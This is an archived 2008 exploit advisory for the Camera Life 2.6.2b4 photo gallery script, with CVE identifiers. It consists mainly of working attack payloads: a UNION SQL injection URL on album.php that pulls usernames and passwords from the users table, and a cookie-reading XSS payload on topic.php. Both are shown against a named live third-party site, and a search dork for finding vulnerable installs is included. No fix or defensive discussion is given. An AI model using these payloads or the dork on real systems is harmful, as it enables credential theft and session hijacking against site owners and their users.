Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting

Author: BackDoor
type: webapps
platform: php
port: 
date_added: 2008-10-08 
date_updated: 2016-12-26 
verified: 1 
codes: OSVDB-51859;CVE-2008-6087;OSVDB-51857;CVE-2008-6086 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcameralife-2.6.2b4.zip

Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"
BackDoor Cyber-Security.TIM //Lojistik

# milw0rm.com [2008-10-09]